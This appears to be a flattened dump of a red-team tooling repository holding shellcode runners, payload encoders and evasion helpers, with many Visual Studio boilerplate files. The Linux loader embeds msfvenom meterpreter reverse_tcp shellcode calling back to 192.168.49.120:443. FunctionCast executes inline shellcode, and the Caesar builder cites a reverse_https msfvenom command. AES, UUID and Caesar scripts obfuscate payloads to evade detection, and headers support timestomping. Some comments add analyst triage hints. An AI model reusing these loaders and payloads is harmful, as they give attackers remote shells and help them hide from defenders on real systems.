/CSharp/NT_ProcessInjection/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/CSharp/NT_ShellcodeRunner/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass_InstallUtil/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/PowerShell/ps_tochar_encrypt_string.ps1:
--------------------------------------------------------------------------------
# Encodes $payload as a run of three-digit decimal groups, one per character:
# each group is the character's code plus 17, left-padded with zeros.
# Despite the "Encrypted string" label printed below, this is a fixed-offset
# encoding with no key. Splitting the output into groups of three digits and
# subtracting 17 from each group recovers the original text, which is how an
# analyst can decode such strings when they turn up in a sample.
$payload = "enc.doc"

[string]$output = ""

foreach ($ch in $payload.ToCharArray()) {
    $shifted = [byte][char]$ch + 17
    # D3 pads to at least three digits, covering the one-, two- and three-digit cases.
    $output += '{0:D3}' -f $shifted
}
# The banner is printed before the clipboard copy on the last line takes place.
Write-Host "[*] String copied to clipboard"
Write-Host "[*] Encrypted string:"
Write-Host $output
$output | clip
26 |
--------------------------------------------------------------------------------
/CSharp/Shell_Service/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.ServiceProcess;
5 | using System.Text;
6 | using System.Threading.Tasks;
7 |
namespace Shell_Service
{
    internal static class Program
    {
        /// <summary>
        /// Process entry point: passes a single <c>Service1</c> instance to
        /// <c>ServiceBase.Run</c>, which registers it with the Service Control
        /// Manager and blocks until the service stops.
        /// </summary>
        /// <remarks>
        /// <c>Service1</c> is defined outside this file, so what the service
        /// does on start cannot be read from here. The binary is meant to be
        /// launched by the SCM, so its registration shows up in
        /// service-installation telemetry (System log event 7045).
        /// </remarks>
        static void Main()
        {
            ServiceBase.Run(new ServiceBase[] { new Service1() });
        }
    }
}
26 |
--------------------------------------------------------------------------------
/C++/SystemFunction032_RC4/typedefs.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 |
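// Counted byte buffer handed to SystemFunction032 for both the data and the
// key. Field order and widths are dictated by the callee and must not change.
// NOTE(review): `_data` and `key` are defined (not merely declared) by this
// header, so including it from more than one translation unit yields
// duplicate-symbol link errors. Left in place because code outside this
// header may reference them.
struct ustring {
    DWORD Length;         // presumably the number of bytes in use in Buffer
    DWORD MaximumLength;  // presumably the capacity of Buffer in bytes
    PUCHAR Buffer;
} _data, key;

// Function-pointer type matching the advapi32 export SystemFunction040, the
// exported name of RtlEncryptMemory (in-place encryption of a memory block).
// The buffer is read and written, so it is annotated _Inout_; the previous
// `_In_ _Out_` pair is not a valid way to express that in SAL.
typedef BOOL (WINAPI* SystemFunction040)
(
    _Inout_ PVOID Memory,
    _In_ ULONG MemorySize,
    _In_ ULONG OptionFlags
);

// Function-pointer type matching SystemFunction041, the exported name of
// RtlDecryptMemory (the inverse of SystemFunction040). Same _Inout_ fix.
typedef BOOL (WINAPI* SystemFunction041)
(
    _Inout_ PVOID Memory,
    _In_ ULONG MemorySize,
    _In_ ULONG OptionFlags
);

// Function-pointer type for the undocumented SystemFunction032 export, which
// applies RC4 to `data` in place using `key`. RC4 is symmetric, so the same
// call both encrypts and decrypts.
// For triage: the export names in this header appearing as strings in a
// binary, or being looked up at run time, are a usable static indicator. How
// this project resolves them is not shown in this header.
typedef NTSTATUS(NTAPI* SystemFunction032)
(
    struct ustring* data,
    const struct ustring* key
);

// Function-pointer type matching SystemFunction036, the exported name of
// RtlGenRandom: fills `buffer` with `len` random bytes.
typedef BOOL(WINAPI* SystemFunction036)
(
    void* buffer,
    ULONG len
);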
--------------------------------------------------------------------------------
/C++/RC4_SysFunc032_Encrypter/typedefs.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 |
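// Counted byte buffer handed to SystemFunction032 for both the data and the
// key. Field order and widths are dictated by the callee and must not change.
// NOTE(review): `_data` and `key` are defined (not merely declared) by this
// header, so including it from more than one translation unit yields
// duplicate-symbol link errors. Left in place because code outside this
// header may reference them.
struct ustring {
    DWORD Length;         // presumably the number of bytes in use in Buffer
    DWORD MaximumLength;  // presumably the capacity of Buffer in bytes
    PUCHAR Buffer;
} _data, key;

// Function-pointer type matching the advapi32 export SystemFunction040, the
// exported name of RtlEncryptMemory (in-place encryption of a memory block).
// The buffer is read and written, so it is annotated _Inout_; the previous
// `_In_ _Out_` pair is not a valid way to express that in SAL.
typedef BOOL (WINAPI* SystemFunction040)
(
    _Inout_ PVOID Memory,
    _In_ ULONG MemorySize,
    _In_ ULONG OptionFlags
);

// Function-pointer type matching SystemFunction041, the exported name of
// RtlDecryptMemory (the inverse of SystemFunction040). Same _Inout_ fix.
typedef BOOL (WINAPI* SystemFunction041)
(
    _Inout_ PVOID Memory,
    _In_ ULONG MemorySize,
    _In_ ULONG OptionFlags
);

// Function-pointer type for the undocumented SystemFunction032 export, which
// applies RC4 to `data` in place using `key`. RC4 is symmetric, so the same
// call both encrypts and decrypts.
// For triage: the export names in this header appearing as strings in a
// binary, or being looked up at run time, are a usable static indicator. How
// this project resolves them is not shown in this header.
typedef NTSTATUS(NTAPI* SystemFunction032)
(
    struct ustring* data,
    const struct ustring* key
);

// Function-pointer type matching SystemFunction036, the exported name of
// RtlGenRandom: fills `buffer` with `len` random bytes.
typedef BOOL(WINAPI* SystemFunction036)
(
    void* buffer,
    ULONG len
);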
--------------------------------------------------------------------------------
/C++/API_Hooking/Detours/ToHook/hookme.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | This exe is compiled and executed.
3 | Then the HookExe compiled DLL is injected into this process
4 | and Detour hooks inside.
5 | There is a defined method for MessageBoxW inside the DLL which will look for
6 | the MessageBoxW API.
7 | If it's found, then a hook will be attached and upon unhooking the process will
8 | be terminated.
9 | */
10 |
11 | #include
12 | #include
13 | #pragma comment(lib, "user32.lib")
14 |
// Target program for the Detours demo. It shows three message boxes in
// sequence so that a MessageBoxW hook installed from outside this process has
// calls to intercept. The program itself installs no hook.
int main() {
    struct Box { const wchar_t* text; const wchar_t* caption; };
    static const Box kBoxes[] = {
        { L"MessageBox1", L"HOOK1" },
        { L"MessageBox2", L"HOOK2" },
        { L"MessageBox3", L"HOOK3" },
    };

    printf("hookme.exe: Starting program....\n");

    // Each call blocks until the user dismisses the dialog.
    for (const Box& box : kBoxes) {
        MessageBoxW(NULL, box.text, box.caption, MB_OK);
    }

    printf("hookme.exe: Exitting now...\n");

    return 0;
}
--------------------------------------------------------------------------------
/C++/API_Hooking/Detours/HookExe/detours/detver.h:
--------------------------------------------------------------------------------
1 | //////////////////////////////////////////////////////////////////////////////
2 | //
3 | // Common version parameters.
4 | //
5 | // Microsoft Research Detours Package, Version 4.0.1
6 | //
7 | // Copyright (c) Microsoft Corporation. All rights reserved.
8 | //
9 |
// Vendored Detours version header: keep in sync with upstream rather than
// editing locally.
// Presumably signals that the build targets the older Windows SDK headers.
#define _USING_V110_SDK71_ 1
#include "winver.h"
// The first branch is compiled out; the #else branch supplies the
// version-resource constants directly.
#if 0
#include
#include
#else
// Two-level macro so that the argument is macro-expanded before being
// turned into a string literal.
#ifndef DETOURS_STRINGIFY
#define DETOURS_STRINGIFY_(x) #x
#define DETOURS_STRINGIFY(x) DETOURS_STRINGIFY_(x)
#endif

// Values for the VERSIONINFO resource. They match the winver.h constants
// VS_FFI_FILEFLAGSMASK, (no flags), VOS_NT_WINDOWS32, VFT_DLL and VFT2_UNKNOWN.
#define VER_FILEFLAGSMASK 0x3fL
#define VER_FILEFLAGS 0x0L
#define VER_FILEOS 0x00040004L
#define VER_FILETYPE 0x00000002L
#define VER_FILESUBTYPE 0x00000000L
#endif
// String form of DETOURS_BITS, which must be defined by the including build.
#define VER_DETOURS_BITS DETOURS_STRINGIFY(DETOURS_BITS)
28 |
--------------------------------------------------------------------------------
/C++/ServiceShell/ServiceShell.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
--------------------------------------------------------------------------------
/C++/bin2uuid.py:
--------------------------------------------------------------------------------
1 | # Author: Bobby Cooke (0xBoku/boku/boku7) // https://twitter.com/0xBoku // github.com/boku7 // https://www.linkedin.com/in/bobby-cooke/ // https://0xboku.com
2 | # Modified code from: https://blog.securehat.co.uk/process-injection/shellcode-execution-via-enumsystemlocala
3 | #!/usr/bin/env python3
4 |
5 | from uuid import UUID
6 | import sys
7 |
# Renders a binary file as a C array of UUID strings, 16 input bytes per entry.
#
# The mapping is fully reversible: UUID(text).bytes_le returns the original
# 16 bytes of an entry, so an analyst who finds such an array in a sample can
# rebuild the underlying blob by concatenating those values. Large tables of
# UUID strings in a binary that has no other use for UUIDs are worth a look.

# The input path is the only positional argument.
if len(sys.argv) < 2:
    print("Usage: %s " % sys.argv[0])
    sys.exit(1)

entry_indent = ' ' * 8

with open(sys.argv[1], "rb") as src:
    block = src.read(16)
    print("{}CHAR* uuids[] =".format(' ' * 4))
    print(" {")

    # Every full 16-byte block becomes one comma-terminated entry.
    while len(block) == 16:
        print("{}\"{}\",".format(entry_indent, UUID(bytes_le=block)))
        block = src.read(16)

    # A short trailing block is padded to 16 bytes with 0x90 and emitted as the
    # final entry without a comma. When the input length is a multiple of 16
    # there is no such block and the last entry keeps its trailing comma.
    if block:
        block = block + (b"\x90" * (16 - len(block)))
        print("{}\"{}\"".format(entry_indent, UUID(bytes_le=block)))

print(" };")
25 |
--------------------------------------------------------------------------------
/C++/Timestomp/typedefs.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 |
4 | #include "ntstructs.h"
5 |
// Export names of the two ntdll routines this project uses, kept as writable
// NUL-terminated char arrays. How they are consumed is outside this header;
// presumably they are passed to a run-time symbol lookup.
char strNtSetInformationFile[] = "NtSetInformationFile";
char strNtQueryInformationFile[] = "NtQueryInformationFile";

// Pointer type for NtQueryInformationFile: reads `Length` bytes of the
// requested information class for `FileHandle` into `FileInformation`.
typedef NTSTATUS(NTAPI *fnNtQueryInformationFile)(
    _In_ HANDLE FileHandle, _Out_ PIO_STATUS_BLOCK IoStatusBlock,
    _Out_ PVOID FileInformation, _In_ ULONG Length,
    _In_ FILE_INFORMATION_CLASS FileInformationClass);

// Pointer type for NtSetInformationFile: writes the supplied information
// class data to `FileHandle`.
// For forensics: timestamps set through this call land in the file's
// $STANDARD_INFORMATION attribute, so comparing them with the $FILE_NAME
// timestamps in the MFT is the usual consistency check. Which information
// class the project passes is not visible in this header.
typedef NTSTATUS (NTAPI *fnNtSetInformationFile)(
    _In_ HANDLE FileHandle, _Out_ PIO_STATUS_BLOCK IoStatusBlock,
    _In_ PVOID FileInformation, _In_ ULONG Length,
    _In_ FILE_INFORMATION_CLASS FileInformationClass);
--------------------------------------------------------------------------------
/CSharp/Linux-Post-Exploitation/shellcode_loader.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | // gcc -o loader loader.c -z execstack
6 | // msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.49.120 lport=443 -f c
7 | //Shellcode
8 | unsigned char buf[] =
9 | "\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05\xef\xff"
10 | "\xff\xff\x48\xbb\xa5\x97\x4d\xc9\xc4\xe6\x49\x88\x48\x31\x58"
11 | "\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xcf\xbe\x15\x50\xae\xe4"
12 | "\x16\xe2\xa4\xc9\x42\xcc\x8c\x71\x01\x31\xa7\x97\x4c\x72\xce"
13 | "\xec\x49\x08\xf4\xdf\xc4\x2f\xae\xf6\x13\xe2\x8f\xcf\x42\xcc"
14 | "\xae\xe5\x17\xc0\x5a\x59\x27\xe8\x9c\xe9\x4c\xfd\x53\xfd\x76"
15 | "\x91\x5d\xae\xf2\xa7\xc7\xfe\x23\xe6\xb7\x8e\x49\xdb\xed\x1e"
16 | "\xaa\x9b\x93\xae\xc0\x6e\xaa\x92\x4d\xc9\xc4\xe6\x49\x88";
17 |
/*
 * Treats the file-scope array `buf` as code: its address is cast to a
 * function pointer and called. The callee's return value is ignored and main
 * has no explicit return statement.
 *
 * For triage: the build line in this file links with `-z execstack`, which
 * sets the executable flag on the ELF GNU_STACK program header. That flag is
 * visible in `readelf -lW` output and is a cheap static indicator for
 * binaries built this way.
 */
int main(int argc, char **argv)
{
    typedef int (*entry_fn)();
    entry_fn entry = (entry_fn)buf;

    entry();
}
24 |
--------------------------------------------------------------------------------
/C++/aes_encrypt_py3.py:
--------------------------------------------------------------------------------
1 | # Red Team Operator course code template
2 | # payload encryption with AES
3 | #
4 | # author: reenz0h (twitter: @SEKTOR7net)
5 |
6 | import sys
7 | from base64 import b64encode
8 | from Crypto.Cipher import AES
9 | from Crypto.Util.Padding import pad
10 | from Crypto.Random import get_random_bytes
11 | import hashlib
12 |
# A fresh 16-byte random value is generated on every run. It is not used as the
# AES key directly: the cipher key is its SHA-256 digest (32 bytes, so AES-256
# in CBC mode), and the IV is fixed at sixteen zero bytes.
# NOTE(review): the key material is printed right next to the ciphertext at the
# end of the script, so this only hides the plaintext from static inspection.
# Anyone holding both arrays can reverse it with AES-CBC,
# key = SHA-256(key[]), IV = 16 zero bytes, followed by unpadding.
KEY = get_random_bytes(16)
iv = b'\x00' * 16
cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)


def _c_bytes(data):
    """Render bytes as the comma-separated hex list used in the C arrays."""
    return ', '.join(hex(value) for value in data)


# The bare except is kept on purpose: any failure to obtain the input (missing
# argument, unreadable file) ends in the same message and exit.
try:
    with open(sys.argv[1], "rb") as source:
        plaintext = source.read()
except:
    print("File argument needed! %s " % sys.argv[0])
    sys.exit()

# Input is padded to the AES block size before encryption.
ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))

with open("rcdata1.bin", "wb") as sink:
    sink.write(ciphertext)
print("Shellcode saved to rcdata1.bin")

print('unsigned char key[] = { ' + _c_bytes(KEY) + ' };')
print('unsigned char shellcode[] = { ' + _c_bytes(ciphertext) + ' };')
--------------------------------------------------------------------------------
/CSharp/ShellcodeBuilder_Caesar/Caesar_Builder.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Text;
3 |
namespace ShellcodeBuilder_Caesar
{
    /// <summary>
    /// Console helper that applies a fixed additive shift to every byte of
    /// <c>buf</c> and prints the result as a hex list.
    /// </summary>
    /// <remarks>
    /// Only the low eight bits of the sum are kept, so adding 983 is the same
    /// as adding 215 modulo 256. The transform is undone by subtracting 215
    /// (equivalently, adding 41) modulo 256, which is what an analyst needs to
    /// decode a buffer produced by this tool. <c>buf</c> is not declared in
    /// this listing; the placeholder comment below marks where it belongs.
    /// </remarks>
    class Caesar_Builder
    {
        static void Main(string[] args)
        {
            // Shellcode
            // msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.0.128 LPORT=443 -f csharp
            // HERE

            byte[] encoded = new byte[buf.Length];
            int pos = 0;
            while (pos < buf.Length)
            {
                // Truncating cast keeps the low byte, matching "& 0xFF".
                encoded[pos] = unchecked((byte)((uint)buf[pos] + 983));
                pos++;
            }

            StringBuilder hex = new StringBuilder(encoded.Length * 2);
            Array.ForEach(encoded, value => hex.AppendFormat("0x{0:x2}, ", value));

            Console.WriteLine("[+] Length of new payload: " + buf.Length);
            Console.WriteLine("[+] Payload: " + hex.ToString());
        }
    }
}
30 |
--------------------------------------------------------------------------------
/C++/Heaven's_Gate/wow64.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 |
//
// Definitions used for running native x64 code from a wow64 process
// https://github.com/rapid7/meterpreter/blob/5e24206d510a48db284d5f399a6951cd1b4c754b/source/common/arch/win/i386/base_inject.h
//
// Pointer to a WINAPI routine that takes one DWORD and returns BOOL.
typedef BOOL(WINAPI* X64FUNCTION)(
    DWORD dwParameter
);

// Pointer to a WINAPI routine that receives an X64FUNCTION together with the
// DWORD to pass along, and returns a DWORD.
typedef DWORD(WINAPI* EXECUTEX64)(
    X64FUNCTION pFunction,
    DWORD dwParameter
);


//
// The context used for injection via migrate_via_remotethread_wow64
//
// Every member is a union of a handle or pointer with an 8-byte array, so each
// one occupies 8 bytes whether the structure is compiled as 32-bit or 64-bit
// code. That keeps the layout identical on both sides of the transition.
// NOTE(review): the padding member is named bPadding2 in three of the four
// unions. It is harmless because each union has its own scope, but it looks
// like a copy-paste leftover.
typedef struct _WOW64CONTEXT {
    union {
        HANDLE hProcess;
        BYTE bPadding2[8];
    } h;

    union {
        LPVOID lpStartAddress;
        BYTE bPadding1[8];
    } s;

    union {
        LPVOID lpParameter;
        BYTE bPadding2[8];
    } p;
    union {
        HANDLE hThread;
        BYTE bPadding2[8];
    } t;
} WOW64CONTEXT, * LPWOW64CONTEXT;
--------------------------------------------------------------------------------
/C++/FunctionCast/FunctionCast.cpp:
--------------------------------------------------------------------------------
1 | #pragma section(".text")
2 |
3 | // pops calc
4 | __declspec(allocate(".text")) static unsigned char buf[] =
5 | "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
6 | "\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
7 | "\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
8 | "\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
9 | "\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
10 | "\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
11 | "\x48\x83\xec\x20\x41\xff\xd6";
12 |
13 |
// Calls the byte array `buf` as if it were a function taking no arguments.
// The array is placed in the image's .text section by the pragma and
// __declspec(allocate) lines above, so this program makes no allocation or
// protection-change API call before the transfer. Detection therefore has to
// come from static inspection of the image or from what the executed bytes do.
int main()
{
    typedef void (*entry_fn)();
    entry_fn entry = (entry_fn)(&buf);

    entry();
}
--------------------------------------------------------------------------------
/C++/GA_Runner/GA_Runner.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/SCMDelivery/SCMDelivery.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/minidump/minidump.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/FunctionCast/FunctionCast.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/APC_Injection/APC_Injection.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/API_Hooking/Detours/ToHook/ToHook.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/AlternateDataStream/AlternateDataStream.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/ETW/ETW-Silencer/ETW-Silencer.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/SC_CreateFiber/SC_CreateFiber.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/VirtualAlloc2/VirtualAlloc2.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/API_Hooking/IAT_Hooking/IAT_Hooking.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/Caesar_Encrypter/Caesar_Encrypter.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/C++/CreateThreadPool/CreateThreadPool.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
